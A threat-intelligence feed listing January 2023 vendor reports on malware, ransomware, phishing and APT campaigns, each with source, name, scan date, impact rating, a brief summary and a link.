Impact:: LOW

Summary:: Researchers from CERT-UA have identified the five different data-wiping malware strains deploying on the network of the country's national news agency (Ukrinform) on January 17th.

Source: https://cert.gov.ua/article/3718487

Intel Source:: Sucuri

Intel Name:: Database_Injection_Attacks_Compromise_WordPress_Sites

Date of Scan:: 2023-01-30

Impact:: LOW

Summary:: Sucuri researchers have identified a massive campaign that infects over 4,500 WordPress websites as part of a long-running operation. According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain that's designed to redirect visitors to undesirable sites.

Source: https://blog.sucuri.net/2023/01/massive-campaign-uses-hacked-wordpress-sites-as-platform-for-black-hat-ad-network.html

Intel Source:: PaloAlto

Intel Name:: Realtek_SDK_Vulnerability_Attempting_to_Hack_IoT_Devices

Date of Scan:: 2023-01-30

Impact:: LOW

Summary:: Researchers from PaloAlto have observed the spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months.

Source: https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/#post-126726-_f37quwequ6r

Intel Source:: ESET

Intel Name:: Sandworm_APT_Targeting_Ukraine

Date of Scan:: 2023-01-30

Impact:: LOW

Summary:: ESET researchers have discovered a new Golang-based wiper, dubbed SwiftSlicer, that is used in attacks aimed at Ukraine. Also, they believe that the Russia-linked APT group Sandwork (aka BlackEnergy and TeleBots) is behind the wiper attacks.

Source: https://twitter.com/ESETresearch/status/1618960022150729728?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1618960022150729728%7Ctwgr%5E9a31baf0903025b52670da9078fb3da0c09ff285%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.com%2F141473%2Fapt%2Fsandworm-targets-ukraine-swiftslicer.html

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_samples_January_8_14th_2023

Date of Scan:: 2023-01-28

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring weekly malware collection samples for January 8-14th, 2023. They shared their analyses of thee cases of distribution of phishing emails during this week and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/46276/

Intel Source:: Trellix

Intel Name:: The_Deep_Examination_of_GuLoader

Date of Scan:: 2023-01-27

Impact:: LOW

Summary:: Trellix researchers have analyzed the multiple archive types used by threat actors to trick users into opening an email attachment and the progression of its distribution inside NSIS (Nullsoft Scriptable Install System) executable files by showing the obfuscation and string encryption updates through the year 2022.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/guloader-the-nsis-vantage-point.html

Intel Source:: PaloAlto

Intel Name:: Chinese_PlugX_Malware_Hidden_in_USB_Devices

Date of Scan:: 2023-01-27

Impact:: MEDIUM

Summary:: Researchers from PaloAlto have discovered a similar variant of PlugX in VirusTotal that infects USB devices and copies all Adobe PDF and Microsoft Word files from the host. It places these copies in a hidden folder on the USB device that is created by the malware.

Source: https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/

Intel Source:: CISA

Intel Name:: Cybercriminals_Leveraging_Legitimate_RMM_software

Date of Scan:: 2023-01-27

Impact:: MEDIUM

Summary:: CISA researchers have identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber-criminal actors send phishing emails to the target to download legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors use in a refund scam to steal money from victim bank accounts.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

Intel Source:: IBM Security Intelligence

Intel Name:: Kronos_Malware_Increasing_its_Functionality

Date of Scan:: 2023-01-27

Impact:: LOW

Summary:: Researchers from IBM Security Intelligence have identified that Kronos Malware is back with new functionality. It is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.

Source: https://securityintelligence.com/kronos-malware-reemerges-increased-functionality/?c=Threat%20Research

Intel Source:: Zscaler

Intel Name:: Hackers_Targeting_Tech_Layoff_Employees_With_Job_Scams

Date of Scan:: 2023-01-27

Impact:: MEDIUM

Summary:: Zscaler Threatlabz researchers have observed multiple suspicious job portals and surveys used by attackers to solicit information from job seekers under the guise of employment application forms. The attackers may advertise jobs online, sometimes setting up fake websites, or look for targets on social media to steal money and personal information.

Source: https://www.zscaler.com/blogs/security-research/job-scams-impersonate-companies-still-hiring-following-tech-layoffs

Intel Source:: TrendMicro

Intel Name:: Mimic_Ransomware_Targeting_Russian_and_English_Speaking_Users

Date of Scan:: 2023-01-27

Impact:: LOW

Summary:: Researchers from TrendMicro have discovered a new ransomware that abuses the APIs of a legitimate tool called Everything, a Windows filename search engine developed by Voidtools that offers quick searching and real-time updates for minimal resource usage.

Source: https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html

Intel Source:: Cyble

Intel Name:: Titan_Stealer_Leveraging_GoLang

Date of Scan:: 2023-01-27

Impact:: LOW

Summary:: Cyble researchers have observed that threat actors use Golang for their information stealer malware. Additionally, it is spotted, Titan stealer using multiple Command and Control (C&C) infrastructures targeting new victims.

Source: https://blog.cyble.com/2023/01/25/titan-stealer-the-growing-use-of-golang-among-threat-actors/

Intel Source:: Bitdefender

Intel Name:: Hackers_Leveraging_ProxyNotShell_For_Attacks

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: BitDefender researchers have started observing an increase in attacks using ProxyNotShell/OWASSRF exploits chains to target on-premises Microsoft Exchange deployments.

Source: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild

Intel Source:: Rapid 7

Intel Name:: Critical_ManageEngine_Vulnerability_Observed

Date of Scan:: 2023-01-26

Impact:: MEDIUM

Summary:: Rapid7 is taking precausios steps from the vulnerability exploitation of CVE-2022-47966. Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Rapid7 provided a detailed analysis of CVE-2022-47966 in AttackerKB. Rapid7 vulnerability research team discovered during testing that some products may be more exploitable than others: ServiceDesk Plus and ADSelfService.

Source: https://www.rapid7.com/blog/post/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

Intel Source:: Proofpoint

Intel Name:: North_Korean_Hackers_Moving_With_Credential_Harvesting

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from Proofpoint have identified a well known North Korean threat group for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_APT_Group_Gamaredon

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of APT Group Gamaredon. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The group is believed to be operating out of Ukraine, and is thought to be focused on targeting Ukrainian government and military organizations, as well as individuals and organizations in the energy sector.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-group-gamaredon-active-iocs-31

Intel Source:: SocInvestigation

Intel Name:: Cybercriminals_Using_JQuery_to_Spread_Malware

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from SocInvestigation have identified that the popular javascript library "JQuery" is used by hackers for distributing malware.

Source: https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/

Intel Source:: Huntress

Intel Name:: The_ConnectWise_Control_vulnerabilities_and_exploitation

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: During the month of December, the Huntress team has caught the talks surrounding supposed ConnectWise Control vulnerabilities and possibly in-the-wild exploitation. The Huntress team has been in contact with both the ConnectWise CISO and security team and did their own research on it and explained their opinions in the details.

Source: https://www.huntress.com/blog/clearing-the-air-overblown-claims-of-vulnerabilities-exploits-severity

Intel Source:: Cyble

Intel Name:: The_rised_concern_of_Amadey_Bot

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Recently, Cyble Research and Intelligence Labs (CRIL) has observed a huge spike of Amadey bot samples. It proved that threat actors are actively using this bot to infect victims’ systems with another malware.

Source: https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/

Intel Source:: Sentinelone

Intel Name:: Hackers_From_DragonSpark_Using_Golang_Malware_to_Avoid_Detection

Date of Scan:: 2023-01-26

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have identified that companies in East Asia are being targeted by a Chinese-speaking threat actor named DragonSpark. The attacks are characterized by the use of the little-known open-source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.

Source: https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Ursnif_Banking_Trojan_aka_Gozi

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan aka Gozi. It is also known as Gozi and Dreambot has been around for more than 10 years. It gained popularity in 2015 when its source code was published on Github and since then the moderators have always tweaked some changes to make use of their arsenal according to their gains.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-aka-gozi-active-iocs-2

Intel Source:: TrendMicro

Intel Name:: Vice_Society_Ransomware_Group_Targeting_Manufacturing_Companies

Date of Scan:: 2023-01-26

Impact:: MEDIUM

Summary:: TrendMicro researchers have highlighted the findings of Vice Society, which includes an end-to-end infection diagram.

Source: https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Remcos_RAT

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Remcos RAT. It is operating since 2016. This RAT was originally promoted as genuine software for remote control of Microsoft Windows from XP onwards, and is frequently found in phishing attempts due to its capacity to completely infect an afflicted machine.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-remcos-rat-active-iocs-86

Intel Source:: Blackberry

Intel Name:: New_Evasion_Methods_For_Emotet

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: BlackBerry researchers have observed that Emotet returns with new techniques. It is continued to steadily evolve, adding new techniques for evasion and increasing its likelihood of successful infections. It is also able to host an array of modules, each used for different aspects of information theft that report back to their command-and-control (C2) servers.

Source: https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Raccoon_Infostealer

Date of Scan:: 2023-01-26

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Raccoon Infostealer. It gathers private data such as credit card numbers, cryptocurrency wallet addresses, login passwords, and browser information like cookies and history.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-raccoon-infostealer-active-iocs-39

Intel Source:: Esentire

Intel Name:: A_Deep_Examination_of_Raspberry_Robin

Date of Scan:: 2023-01-25

Impact:: LOW

Summary:: Esentire researchers have observed 11 cases of Raspberry Robin infections since May 2022 and analyzed them.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raspberry-robin

Intel Source:: Uptycs

Intel Name:: Titan_Stealer_Malware_Distributing_via_Telegram_Channel

Date of Scan:: 2023-01-25

Impact:: LOW

Summary:: Researchers from Uptycs have discovered a campaign involving the Titan Stealer malware, which is being marketed and sold by a threat actor (TA) through a Telegram channel for cybercrime purposes.

Source: https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign

Intel Source:: Confiant

Intel Name:: Black_Friday_Day_Makes_Big_For_Malvertising

Date of Scan:: 2023-01-25

Impact:: LOW

Summary:: Confiant researchers have observed a cookie-stuffing campaign running across multiple programmatic ad platforms with a specific uptick in Q4 around Black Friday.

Source: https://blog.confiant.com/malvertiser-makes-the-big-bucks-on-black-friday-637922cd5865

Intel Source:: Radware

Intel Name:: 8220_Gang_Targeting_Vulnerable_Cloud_Providers

Date of Scan:: 2023-01-24

Impact:: LOW

Summary:: Radware researchers have identified that the Chinese threat group a.k.a 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.

Source: https://www.radware.com/getattachment/7f0b519f-b292-49f4-9319-746218961cc6/Advisory-8220-Gang-Targeting-Cloud-Providers-012023.pdf.aspx

Intel Source:: Human Blog

Intel Name:: Advertisement_Fraud_Scheme_VASTFLUX_Targeted_Over_11_Million_Devices

Date of Scan:: 2023-01-24

Impact:: LOW

Summary:: Researchers from HUMAN’s Satori Threat Intelligence team have identified a sophisticated ad fraud scheme, dubbed VASTFLUX, that targeted more than 11 million devices.

Source: https://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown

Intel Source:: Cyfirma

Intel Name:: Remcos_RAT_Deployment_by_GuLoader

Date of Scan:: 2023-01-24

Impact:: LOW

Summary:: CYFIRMA researchers have identified the distribution of a malicious PDF file through email. It redirects the user to a cloud-based platform where they are prompted to download a ZIP file.

Source: https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/

Intel Source:: Analyst1

Intel Name:: Diving_Deep_into_LockBit_Ransomware

Date of Scan:: 2023-01-23

Impact:: MEDIUM

Summary:: Researchers from Analyst1 have analyzed the LockBit ransomware operations. It is one of the most notorious organized cybercrime syndicates that exists today.

Source: https://analyst1.com/ransomware-diaries-volume-1/

Intel Source:: Mandiant

Intel Name:: Exploitation_of_FortiOS_Vulnerability_CVE_2022_42475

Date of Scan:: 2023-01-20

Impact:: HIGH

Summary:: Mandiant is monitoring a suspected China-nexus campaign that exploited a recently discovered vulnerability in Fortinet's FortiOS SSL-VPN, CVE-2022-42475, as a zero-day. Mandiant discovered a new malware called “BOLDMOVE” during the investigation. They found a Windows variant of BOLDMOVE and a Linux variant, which is specifically designed to run on FortiGate Firewalls.

Source: https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

Intel Source:: Fortinet

Intel Name:: New_CrySIS_or_Dharma_Ransomware_Variants

Date of Scan:: 2023-01-20

Impact:: MEDIUM

Summary:: Fortinet Labs researchers have analyzed the variants of the CrySIS/Dharma ransomware family.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-playing-whack-a-mole-with-new-crysis-dharma-variants

Intel Source:: Mandiant

Intel Name:: Fortinet_Firewall_Vulnerability_Exploited_by_New_Chinese_Malware

Date of Scan:: 2023-01-20

Impact:: MEDIUM

Summary:: Researchers from Mandiant have identified a China-nexus threat actor who exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.

Source: https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

Intel Source:: Sucuri

Intel Name:: Database_Infections_That_Compromise_Vulnerable_WordPress_Sites

Date of Scan:: 2023-01-20

Impact:: LOW

Summary:: Sucuri researchers have identified a database injection that has two different pieces of malware accomplishing two unrelated goals. The first injection redirects users to a spammy sports website and the second injection boosts authority of a spammy casino website within search engines.

Source: https://blog.sucuri.net/2023/01/vulnerable-wordpress-sites-compromised-with-different-database-infections.html?web_view=true

Intel Source:: Team Cymru

Intel Name:: The_Vidar_operators_expanding_their_infrastructure

Date of Scan:: 2023-01-20

Impact:: MEDIUM

Summary:: Team Cymru researchers analyzed on Darth Vidar infrastructure. Vidar operators appear to be expanding their infrastructure. Vidar is an info-stealer malware, which was first spotted in the wild in late 2018 by the security researcher Fumik0. The name itself (Vidar) is derived from a string found in the malware’s code. Vidar is considered to be a distinct fork of the Arkei malware family.

Source: https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_samples_January_9_15th_2023

Date of Scan:: 2023-01-20

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring weekly malware collection samples for January 9-15th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and Lokibot.

Source: https://asec.ahnlab.com/en/46169/

Intel Source:: TrendMicro

Intel Name:: Batloader_Malware_Attacks_in_Q4_2022_Used_Obfuscated_JavaScript_Files_and_Legitimate_Tools

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: Researchers from TrendMicro have identified notable Batloader campaigns that they observed in the last quarter of 2022, including the abuse of custom action scripts from the Advanced Installer software and Windows Installer XML (WiX) toolset, the use of obfuscated JavaScript files as a first-stage payload, and the use of PyArmor tool to obfuscate Batloader Python scripts.

Source: https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_STRRAT_Malware

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of STRRAT Malware. It is a Java-based Remote-Access Trojan (RAT) with a slew of malicious features, notably information theft and backdoor capabilities.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-strrat-malware-active-iocs-7

Intel Source:: Sentilone

Intel Name:: The_SEO_Poisoning_attack

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: A lot of researchers have observed increase in malicious search engine advertisements found in the wild – known as SEO Poisoning, which is malvertising (malicious advertising) activity. There is an increasing variety in the specifics of the malware delivery method, such as which searches produce the malicious advertisements and which malware being delivered.

Source: https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/

Intel Source:: Malwarebytes

Intel Name:: Cybersecurity_incident_on_website_of_Liquor_Control_Board_of_Ontario

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: This month, the Liquor Control Board of Ontario (LCBO) shared the news about a cybersecurity incident, affecting online sales. The cybersecurity incident was a web skimmer, which is designed to retrieve customer payment information.

Source: https://www.malwarebytes.com/blog/news/2023/01/web-skimmer-found-on-website-of-liquor-control-board-of-ontario

Intel Source:: Talos

Intel Name:: The_LNK_metadata_trail

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: Cisco Talos reserachers analyzed metadata in LNK files that lined to threat actors tactics techniques and procedures, to identify their activity. The researchers report shares their analyses on Qakbot and Gamaredon as examples.

Source: https://blog.talosintelligence.com/following-the-lnk-metadata-trail/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Gh0st_RAT

Date of Scan:: 2023-01-19

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Gh0st RAT. It is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information and data. This type of malware enables cybercriminals to gain complete access to infected computers and attempt to hijack the user’s banking account.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gh0st-rat-active-iocs-4

Intel Source:: ISC.SANS

Intel Name:: Malicious_Google_Ads

Date of Scan:: 2023-01-18

Impact:: LOW

Summary:: Researchers from SANS have identified that Google ads are a common vector for malware distribution. These ads frequently lead to fake sites impersonating web pages for legitimate software.

Source: https://isc.sans.edu/diary/rss/29448

Intel Source:: Cyfirma

Intel Name:: Abusing_Google_Ads_platform_by_various_campaigns

Date of Scan:: 2023-01-18

Impact:: LOW

Summary:: CYFIRMA researchers observed the campaigns closely and they provided preliminary analysis of a new RAT known as “VagusRAT” and its possible attribution to Iranian Threat actors. The VagusRAT is also delivered to the victims by exploiting Google Ads.

Source: https://www.cyfirma.com/outofband/vagusrat-a-new-entrant-in-the-external-threat-landscape/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_NJRAT

Date of Scan:: 2023-01-18

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of NJRAT. It is a Remote Access Trojan, which is found leveraging Pastebin to deliver a second-stage payload after initial infection.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-njrat-active-iocs-49

Intel Source:: PaloAlto

Intel Name:: Attacks_on_Iranian_Government_Entities_Through_Backdoor_Diplomacy

Date of Scan:: 2023-01-18

Impact:: MEDIUM

Summary:: PaloAlto researchers have identified that the threat actor known as Backdoor Diplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022.

Source: https://unit42.paloaltonetworks.com/playful-taurus/

Intel Source:: Sentilone

Intel Name:: The_observation_of_the_numerous_attacks_by_NetSupport_RAT_campaign

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Researchers from ASEC reported on a NetSupport RAT campaign that uses a Pokemon as the social engineering lure. Threat actors is hosting a Pokemon-based NFT gameat the malicious sites offering both a fun and financially rewards.

Source: https://www.sentinelone.com/blog/gotta-catch-em-all-understanding-the-netsupport-rat-campaigns-hiding-behind-pokemon-lures/

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Phishing_Email_Threats_analyses_January_1_7_2023

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explained the samples of distribution of phishing emails during the week from January 1st, 2023 to January 7th, 2022. The most prevalent threat type was observed in phishing email attachments was FakePage, taking up 58%. FakePages are web pages where the threat actor has duplicated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information.

Source: https://asec.ahnlab.com/en/45693/

Intel Source:: ASEC

Intel Name:: Phishing_Email_Targeting_National_Tax_Service

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Researchers from ASEC have discovered that a phishing email impersonating the National Tax Service is distributing.

Source: https://asec.ahnlab.com/en/45669/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Bitter_APT_Group

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: The Rewterz analysts team did an analysis summary on Bitter APT Group. APT-17 group aka BITTER APT group has been recently active and targeting sectors in South Asia for information theft and espionage. This group has a history of targeting Energy, Engineering, and Government in South Asia.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bitter-apt-group-active-iocs-22

Intel Source:: Avast

Intel Name:: Decryption_Tool_For_BianLian_Ransomware_Released_by_Avast

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Avast researchers have released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.

Source: https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/

Intel Source:: ASEC

Intel Name:: A_manuscript_Solicitation_Letter_was_disguised_by_malware

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: On January 8th, the ASEC analysis team discovered a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.

Source: https://asec.ahnlab.com/en/45658/

Intel Source:: Perception-Point

Intel Name:: Exploitation_by_attackers_to_deliver_malware_with_Microsoft_Office_macros

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: The Perception-Point researchers discussed in their blog on similarity of Microsoft Office macros, which are widely exploited by attackers and used to delivering malware. They discussed the tactics of similarity based on real-world samples that was detected in the wild.

Source: https://perception-point.io/blog/malicious-office-macros-detecting-similarity-in-the-wild-2/

Intel Source:: ASEC

Intel Name:: Document_Type_Malware_Targeting_Security_Field_Workers

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: ASEC researchers have observed document-type malware distributing and targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.

Source: https://asec.ahnlab.com/en/45658/

Intel Source:: Sekoia

Intel Name:: Other_Threat_Actor_Can_Use_Raspberry_Robin

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Sekoia researchers have identified that Raspberry Robin's attack infrastructure, that possible for other threat actors to repurpose the infections for their own malicious activities which makes it an even more potent threat.

Source: https://blog.sekoia.io/raspberry-robins-botnet-second-life/

Intel Source:: CircleCI

Intel Name:: A_Deep_Analysis_of_CircleCI_Security_Alert

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Researchers from CircleCI have received an alert and analyzed the suspicious GitHub OAuth activity.

Source: https://circleci.com/blog/jan-4-2023-incident-report/

Intel Source:: Fortinet

Intel Name:: Three_PyPI_Package_Spreading_Malware_to_Developer_Systems

Date of Scan:: 2023-01-17

Impact:: MEDIUM

Summary:: Fortinet researchers have identified that a threat actor named Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that is designed to drop malware on compromised developer systems.

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps

Intel Source:: TrendMicro

Intel Name:: Hackers_Using_Middle_Eastern_Geopolitical_Themed_to_Distribute_NjRAT

Date of Scan:: 2023-01-17

Impact:: LOW

Summary:: Researchers from TrendMicro have identified an active campaign that is using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa. In this campaign, Earth Bogle, the threat actor uses public cloud storage services such as files.fm and failiem.lv to host malware, while compromised web servers distribute NjRAT.

Source: https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html

Intel Source:: Crep1x

Intel Name:: Vidar_Stealer_Attack_Campaign_impersonating_AnyDesk

Date of Scan:: 2023-01-15

Impact:: LOW

Summary:: Typosquatting attack campaign found in the wild impersonating multiple legitimate RMM tools and redirecting users to fake AnyDesk websites triggering Vidar Stealer Payload download through dropbox.

Source: https://twitter.com/crep1x/status/1612199364805660673

Intel Source:: PaloAlto

Intel Name:: PurpleUrchin_Campaign_Bypass_CAPTCHA_and_Steals_Cloud_Platform_Resources

Date of Scan:: 2023-01-14

Impact:: LOW

Summary:: Researchers from PaloAlto have analyzed Automated Libra, the cloud threat actor group behind the freejacking campaign PurpleUrchin. Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.

Source: https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/

Intel Source:: Cyble

Intel Name:: Rhadamanthys_Stealer_Leverages_Google_Ads_in_the_wild

Date of Scan:: 2023-01-14

Impact:: LOW

Summary:: Researchers from Cyble found a new malware strain, Rhadamanthys Stealer, leveraging Spam and Phishing campaigns through Google Ads and redirecting users to fake phishing websites of popular software. The Malware downloaded in the background of legitimate files or through obfuscated images steals sensitive information to further aid in unauthorized access.

Source: https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/

Intel Source:: Esentire

Intel Name:: Gootloader_Malware_returns_with_revamped_infection_technique

Date of Scan:: 2023-01-14

Impact:: LOW

Summary:: Researchers from Esentire found Gootloader malware activity with a new infection technique, further leading to Cobalt Strike leveraging existing PowerShell process beaconed to various malicious domains. The attacker seems to be hands-on, dropping multiple payloads, including BloodHound and PsExec, while being persistent and targeting different areas for further compromise.

Source: https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity

Intel Source:: ASEC

Intel Name:: Orcus_RAT_being_distributed_on_file_sharing_sites

Date of Scan:: 2023-01-13

Impact:: LOW

Summary:: The ASEC analysis team recently identified Orcus RAT being distributed on file-sharing sites disguised as a cracked version of Hangul Word Processor.

Source: https://asec.ahnlab.com/en/45462/

Intel Source:: Deep Instinct

Intel Name:: RAT_Malware_Campaign_Using_Polyglot_Files_to_Evade_Detection

Date of Scan:: 2023-01-13

Impact:: LOW

Summary:: Deep Instinct researchers have identified that operators of the StrRAT and Ratty remote access trojans (RAT) are running a new campaign using polyglot MSI/JAR and CAB/JAR files to evade detection from security tools.

Source: https://www.deepinstinct.com/blog/malicious-jars-and-polyglot-files-who-do-you-think-you-jar

Intel Source:: Wordfence

Intel Name:: Spike_in_Holiday_Attacks_Targeting_Ancient_Vulnerabilities_and_Hidden_Webshells

Date of Scan:: 2023-01-13

Impact:: LOW

Summary:: Researchers from Wordfence have observed spikes in attack traffic over the Christmas and New Year holidays, which is specifically targeting the Downloads Manager plugin by Giulio Ganci.

Source: https://www.wordfence.com/blog/2023/01/holiday-attack-spikes-target-ancient-vulnerabilities-and-hidden-webshells/

Intel Source:: Rapid7

Intel Name:: Research_on_HIVE_Ransomware_attacks

Date of Scan:: 2023-01-13

Impact:: MEDIUM

Summary:: Rapid7 monitors and research on the range of techniques that threat actors use to conduct malicious activity. Recently, Rapid7 observed a malicious activity performed by threat actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files.

Source: https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/

Intel Source:: Fortinet

Intel Name:: The_Deep_Investigation_of_FortiOS_Zero_Day_Attack

Date of Scan:: 2023-01-13

Impact:: LOW

Summary:: Researchers from Fortinet have analyzed the zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.

Source: https://www.fortinet.com/blog/psirt-blogs/analysis-of-fg-ir-22-398-fortios-heap-based-buffer-overflow-in-sslvpnd

Intel Source:: Eclecticiq

Intel Name:: Unpatched_Vulnerability_to_Bypass_Windows_OS_Security_Feature

Date of Scan:: 2023-01-13

Impact:: MEDIUM

Summary:: EclecticIQ analysts researched on QakBot phishing campaigns who can turn it to a Zero-Day Vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.

Source: https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature

Intel Source:: Avast

Intel Name:: The_Examine_of_NeedleDropper_Malware

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: Avast researchers have analyzed the NeedleDropper malware and it is a self-extracting archive that contains a modified AutoIt interpreter, obfuscated AutoIt script, and Visual Basic script, which is used for initial execution.

Source: https://decoded.avast.io/threatresearch/needledropper/

Intel Source:: Cybereason

Intel Name:: Diving_Deep_into_IcedID_Malware

Date of Scan:: 2023-01-12

Impact:: LOW

Summary:: Cybereason researchers have analyzed IcedID infection that illustrates the tactics, techniques, and procedures (TTPs) used in a recent campaign. It is also known as BokBot, which is traditionally known as a banking trojan used to steal financial information from its victims.

